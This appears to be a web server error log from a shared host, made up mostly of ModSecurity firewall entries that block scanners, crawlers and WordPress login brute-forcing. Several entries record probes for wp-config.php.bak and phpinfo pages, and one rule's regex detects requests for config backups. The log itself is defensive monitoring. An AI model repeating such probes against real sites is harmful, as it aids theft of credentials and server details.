[Tue May 26 15:01:55.508512 2026] [security2:error] [pid 662057:tid 662191] [client 154.161.32.97:57095] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "lmialumni.org"] [uri "/xmlrpc.php"] [unique_id "ahVoi_T3lMm9tGFVg9RsYQAAAQ4"]
[Tue May 26 15:01:55.946575 2026] [security2:error] [pid 662057:tid 662197] [client 4.193.189.92:7199] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 92.189.193.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "doyecpa.com"] [uri "/y.php"] [unique_id "ahVoi_T3lMm9tGFVg9RsbwAAARQ"]
[Tue May 26 15:01:56.836948 2026] [security2:error] [pid 662057:tid 662228] [client 57.141.2.6:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVojPT3lMm9tGFVg9RsfwAAATM"]
[Tue May 26 15:01:59.146327 2026] [security2:error] [pid 662057:tid 662216] [client 57.141.2.31:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVojvT3lMm9tGFVg9RswAAAASc"]
[Tue May 26 15:01:59.363278 2026] [security2:error] [pid 662057:tid 662268] [client 178.248.6.227:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVojvT3lMm9tGFVg9RsyAAAAVs"]
[Tue May 26 15:02:00.397686 2026] [autoindex:error] [pid 662057:tid 662213] [client 194.163.181.75:65224] AH01276: Cannot serve directory /home2/debatqhn/agsnails.com/wp-admin/css/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com
[Tue May 26 15:02:00.620765 2026] [security2:error] [pid 662057:tid 662248] [client 37.139.53.229:49159] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "anujtradingco.com"] [uri "/wp-login.php"] [unique_id "ahVokPT3lMm9tGFVg9Rs3wAAAUc"], referer: https://anujtradingco.com
[Tue May 26 15:02:01.301024 2026] [security2:error] [pid 662057:tid 662226] [client 57.141.2.38:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVokPT3lMm9tGFVg9Rs-AAAATE"]
[Tue May 26 15:02:02.361073 2026] [security2:error] [pid 662057:tid 662218] [client 195.178.110.34:50958] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-config\\\\.php(?:\\\\W[a-z]*|bak)" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "300"] [id "900256"] [msg "Wp-Config Backup/edit file request"] [hostname "cpanel.consultrgb.com"] [uri "/wp-config.php.bak"] [unique_id "ahVokvT3lMm9tGFVg9RtEAAAASk"]
[Tue May 26 15:02:02.571750 2026] [security2:error] [pid 662057:tid 662101] [remote 51.91.98.45:33986] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 45.98.91.51.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/wp-login.php"] [unique_id "ahVokvT3lMm9tGFVg9RtEgABYSs"]
[Tue May 26 15:02:03.447689 2026] [security2:error] [pid 662057:tid 662253] [client 57.141.2.9:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVok_T3lMm9tGFVg9RtIQAAAUw"]
[Tue May 26 15:02:03.644459 2026] [security2:error] [pid 662057:tid 662307] [client 136.243.220.209:3863] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 209.220.243.136.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.glorodrc.com"] [uri "/index.php"] [unique_id "ahVok_T3lMm9tGFVg9RtKwAAAYI"]
[Tue May 26 15:02:05.777095 2026] [security2:error] [pid 662057:tid 662264] [client 57.141.2.63:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVolfT3lMm9tGFVg9RtUwAAAVc"]
[Tue May 26 15:02:07.105510 2026] [autoindex:error] [pid 662057:tid 662122] [remote 15.204.161.7:33510] AH01276: Cannot serve directory /home2/jhonwy9v/stvica.com/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 15:02:07.761320 2026] [security2:error] [pid 662057:tid 662263] [client 136.243.220.209:14127] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 209.220.243.136.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.glorodrc.com"] [uri "/index.php"] [unique_id "ahVol_T3lMm9tGFVg9RthwAAAVY"]
[Tue May 26 15:02:08.076693 2026] [security2:error] [pid 662057:tid 662279] [client 160.119.76.55:39580] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "500"] [hostname "example.com"] [uri "/index.php"] [unique_id "ahVomPT3lMm9tGFVg9RtmAAAAWY"]
[Tue May 26 15:02:08.234803 2026] [security2:error] [pid 662057:tid 662245] [client 57.141.2.71:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVol_T3lMm9tGFVg9RtjQAAAUQ"]
[Tue May 26 15:02:08.368930 2026] [security2:error] [pid 662057:tid 662304] [client 160.119.76.55:39584] ModSecurity: Access denied with code 406 (phase 1). Pattern match "CONNECT" at REQUEST_METHOD. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "56"] [id "340361"] [rev "3"] [msg "Atomicorp.com WAF Rules: CONNECT method denied"] [data "CONNECT"] [severity "CRITICAL"] [hostname "example.com"] [uri "/"] [unique_id "ahVomPT3lMm9tGFVg9RtpQAAAX8"]
[Tue May 26 15:02:08.369030 2026] [security2:error] [pid 662057:tid 662304] [client 160.119.76.55:39584] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "406"] [hostname "example.com"] [uri "/"] [unique_id "ahVomPT3lMm9tGFVg9RtpQAAAX8"]
[Tue May 26 15:02:09.391099 2026] [security2:error] [pid 662057:tid 662227] [client 195.178.110.34:45990] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-config\\\\.php(?:\\\\W[a-z]*|bak)" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "300"] [id "900256"] [msg "Wp-Config Backup/edit file request"] [hostname "cpanel.consultrgb.com"] [uri "/wp-config.php.bak"] [unique_id "ahVomfT3lMm9tGFVg9Rt0QAAATI"]
[Tue May 26 15:02:10.477292 2026] [security2:error] [pid 662057:tid 662307] [client 57.141.2.17:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVomvT3lMm9tGFVg9Rt4wAAAYI"]
[Tue May 26 15:02:11.543524 2026] [security2:error] [pid 662057:tid 662205] [client 136.243.220.209:31318] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 209.220.243.136.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.glorodrc.com"] [uri "/index.php"] [unique_id "ahVom_T3lMm9tGFVg9RuDwAAARw"]
[Tue May 26 15:02:12.012043 2026] [security2:error] [pid 662057:tid 662156] [remote 88.198.165.116:53434] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 116.165.198.88.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "jhonparra.com"] [uri "/wp-login.php"] [unique_id "ahVom_T3lMm9tGFVg9RuFgABhmI"]
[Tue May 26 15:02:12.639483 2026] [security2:error] [pid 662057:tid 662307] [client 57.141.2.13:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVonPT3lMm9tGFVg9RuKgAAAYI"]
[Tue May 26 15:02:14.881604 2026] [security2:error] [pid 662057:tid 662257] [client 57.141.2.8:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVonvT3lMm9tGFVg9RuZgAAAVA"]
[Tue May 26 15:02:15.943753 2026] [security2:error] [pid 662057:tid 662285] [client 136.243.220.209:13910] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 209.220.243.136.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.glorodrc.com"] [uri "/index.php"] [unique_id "ahVon_T3lMm9tGFVg9RunQAAAWw"]
[Tue May 26 15:02:15.972273 2026] [security2:error] [pid 662057:tid 662281] [client 195.178.110.34:44396] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-config\\\\.php(?:\\\\W[a-z]*|bak)" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "300"] [id "900256"] [msg "Wp-Config Backup/edit file request"] [hostname "cpanel.consultrgb.com"] [uri "/wp-config.php.bak"] [unique_id "ahVon_T3lMm9tGFVg9RuoAAAAWg"]
[Tue May 26 15:02:16.751580 2026] [security2:error] [pid 662057:tid 662265] [client 57.141.2.64:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVooPT3lMm9tGFVg9RurgAAAVg"]
[Tue May 26 15:02:19.536546 2026] [security2:error] [pid 662057:tid 662251] [client 195.178.110.34:44412] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 34.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpanel.consultrgb.com"] [uri "/info.php"] [unique_id "ahVoo_T3lMm9tGFVg9RvAQAAAUo"]
[Tue May 26 15:02:19.734270 2026] [security2:error] [pid 662057:tid 662198] [client 136.243.220.209:62803] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 209.220.243.136.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.glorodrc.com"] [uri "/index.php"] [unique_id "ahVoo_T3lMm9tGFVg9RvBQAAARU"]
[Tue May 26 15:02:19.903470 2026] [security2:error] [pid 662057:tid 662204] [client 195.178.110.34:44422] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 34.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpanel.consultrgb.com"] [uri "/dashboard/phpinfo.php"] [unique_id "ahVoo_T3lMm9tGFVg9RvDwAAARs"]
[Tue May 26 15:02:20.396301 2026] [security2:error] [pid 662057:tid 662240] [client 194.35.113.246:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahVopPT3lMm9tGFVg9RvIAAAAT8"], referer: https://www.anujtradingco.com/
[Tue May 26 15:02:21.740119 2026] [security2:error] [pid 662057:tid 662305] [client 57.141.2.29:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVopfT3lMm9tGFVg9RvPAAAAYA"]
[Tue May 26 15:02:21.822424 2026] [security2:error] [pid 662057:tid 662160] [remote 125.99.184.138:40266] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 138.184.99.125.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "poonawallatennisacademy.moes-art.com"] [uri "/wp-login.php"] [unique_id "ahVopfT3lMm9tGFVg9RvTwABUmY"]
[Tue May 26 15:02:22.049036 2026] [security2:error] [pid 662057:tid 662255] [client 114.119.145.129:53577] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "preetishah.com"] [uri "/episodes/the-grudge-holder-the-struggle-series"] [unique_id "ahVopvT3lMm9tGFVg9RvXAAAAU4"], referer: https://preetishah.com/episodes/the-predicament-of-an-over-giver-the-struggle-series
[Tue May 26 15:02:22.774706 2026] [security2:error] [pid 662057:tid 662194] [client 194.35.113.246:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVopvT3lMm9tGFVg9RveQAAARE"], referer: https://www.anujtradingco.com/pages/services-wide/?unapproved=1227354&moderation-hash=b9368c69a56364ed6cb543beb5e31d42
[Tue May 26 15:02:23.771784 2026] [security2:error] [pid 662057:tid 662226] [client 136.243.220.209:54516] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 209.220.243.136.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.glorodrc.com"] [uri "/index.php"] [unique_id "ahVop_T3lMm9tGFVg9RvlQAAATE"]
[Tue May 26 15:02:23.808332 2026] [security2:error] [pid 662057:tid 662242] [client 57.141.2.55:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVop_T3lMm9tGFVg9RviwAAAUE"]
[Tue May 26 15:02:24.776390 2026] [security2:error] [pid 662057:tid 662163] [remote 222.165.190.235:34128] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.190.165.222.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "theafterglow-centre.com"] [uri "/wp-login.php"] [unique_id "ahVoqPT3lMm9tGFVg9RvqQABgmk"]
[Tue May 26 15:02:25.383079 2026] [security2:error] [pid 662057:tid 662218] [client 216.213.26.210:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahVoqfT3lMm9tGFVg9RvwgAAASk"], referer: https://www.anujtradingco.com/
[Tue May 26 15:02:26.054066 2026] [security2:error] [pid 662057:tid 662208] [client 57.141.2.5:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVoqfT3lMm9tGFVg9RvywAAAR8"]
[Tue May 26 15:02:26.607117 2026] [security2:error] [pid 662057:tid 662252] [client 216.213.26.210:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVoqvT3lMm9tGFVg9Rv3QAAAUs"], referer: https://www.anujtradingco.com/pages/services-modern/?unapproved=1457475&moderation-hash=cb05a27ddb4c2ccdc8514fd0d20f8332
[Tue May 26 15:02:26.842195 2026] [security2:error] [pid 662057:tid 662306] [client 85.208.96.211:64410] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/page/3/"] [unique_id "ahVoqvT3lMm9tGFVg9Rv6wAAAYE"]
[Tue May 26 15:02:26.842336 2026] [security2:error] [pid 662057:tid 662306] [client 85.208.96.211:64410] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/page/3/"] [unique_id "ahVoqvT3lMm9tGFVg9Rv6wAAAYE"]
[Tue May 26 15:02:27.677090 2026] [security2:error] [pid 662057:tid 662310] [client 57.141.2.46:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVoq_T3lMm9tGFVg9Rv9AAAAYU"]
[Tue May 26 15:02:27.992861 2026] [security2:error] [pid 662057:tid 662271] [client 136.243.220.209:51638] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 209.220.243.136.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.glorodrc.com"] [uri "/index.php"] [unique_id "ahVoq_T3lMm9tGFVg9RwCgAAAV4"]
[Tue May 26 15:02:28.054786 2026] [security2:error] [pid 662057:tid 662288] [client 114.119.155.83:49509] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "glorodavionics.com"] [uri "/index.php"] [unique_id "ahVorPT3lMm9tGFVg9RwCwAAAW8"], referer: http://glorodavionics.com/index.php?route=product/product&manufacturer_id=11&product_id=221&page=11
[Tue May 26 15:02:28.360436 2026] [security2:error] [pid 662057:tid 662218] [client 194.35.113.246:35305] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "anujtradingco.com"] [uri "/wp-login.php"] [unique_id "ahVoq_T3lMm9tGFVg9RwCQAAASk"], referer: https://anujtradingco.com
[Tue May 26 15:02:29.638401 2026] [security2:error] [pid 662057:tid 662195] [client 216.213.26.210:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVorfT3lMm9tGFVg9RwOAAAARI"], referer: https://anujtradingco.com
[Tue May 26 15:02:30.041570 2026] [security2:error] [pid 662057:tid 662288] [client 195.178.110.34:52736] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 34.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpanel.consultrgb.com"] [uri "/dashboard/phpinfo.php"] [unique_id "ahVorvT3lMm9tGFVg9RwRQAAAW8"]
[Tue May 26 15:02:30.782991 2026] [security2:error] [pid 662057:tid 662313] [client 57.141.2.14:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVorvT3lMm9tGFVg9RwTwAAAYg"]
[Tue May 26 15:02:32.033801 2026] [security2:error] [pid 662057:tid 662298] [client 136.243.220.209:53932] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 209.220.243.136.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.glorodrc.com"] [uri "/index.php"] [unique_id "ahVosPT3lMm9tGFVg9RwdwAAAXk"]
[Tue May 26 15:02:32.584784 2026] [security2:error] [pid 662057:tid 662188] [client 57.141.2.9:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVosPT3lMm9tGFVg9RwegAAAQs"]
[Tue May 26 15:02:34.354996 2026] [security2:error] [pid 662057:tid 662233] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVosfT3lMm9tGFVg9RwtgAAATg"]
[Tue May 26 15:02:34.899373 2026] [security2:error] [pid 662057:tid 662109] [remote 82.223.0.235:41238] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.0.223.82.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "crustiesplacebakery.com.thedebateafrica.org"] [uri "/wp-login.php"] [unique_id "ahVosvT3lMm9tGFVg9RwzgABLTM"]
[Tue May 26 15:02:36.078665 2026] [security2:error] [pid 662057:tid 662201] [client 136.243.220.209:26508] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 209.220.243.136.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.glorodrc.com"] [uri "/index.php"] [unique_id "ahVotPT3lMm9tGFVg9Rw6gAAARg"]
[Tue May 26 15:02:36.609752 2026] [security2:error] [pid 662057:tid 662302] [client 57.141.2.63:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVotPT3lMm9tGFVg9Rw8AAAAX0"]
[Tue May 26 15:02:38.885844 2026] [security2:error] [pid 662057:tid 662253] [client 57.141.2.35:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVotvT3lMm9tGFVg9RxOgAAAUw"]
[Tue May 26 15:02:39.202042 2026] [security2:error] [pid 662057:tid 662170] [remote 46.101.54.125:41024] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 125.54.101.46.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "rohiniventures.com"] [uri "/wp-login.php"] [unique_id "ahVot_T3lMm9tGFVg9RxSgABIXA"]
[Tue May 26 15:02:39.847158 2026] [security2:error] [pid 662057:tid 662295] [client 136.243.220.209:8609] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 209.220.243.136.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.glorodrc.com"] [uri "/index.php"] [unique_id "ahVot_T3lMm9tGFVg9RxYwAAAXY"]
[Tue May 26 15:02:39.974291 2026] [security2:error] [pid 662057:tid 662228] [client 195.178.110.34:38364] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 34.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpanel.consultrgb.com"] [uri "/dashboard/phpinfo.php"] [unique_id "ahVot_T3lMm9tGFVg9RxZQAAATM"]
[Tue May 26 15:02:41.430934 2026] [security2:error] [pid 662057:tid 662266] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVoufT3lMm9tGFVg9RxiQAAAVk"]
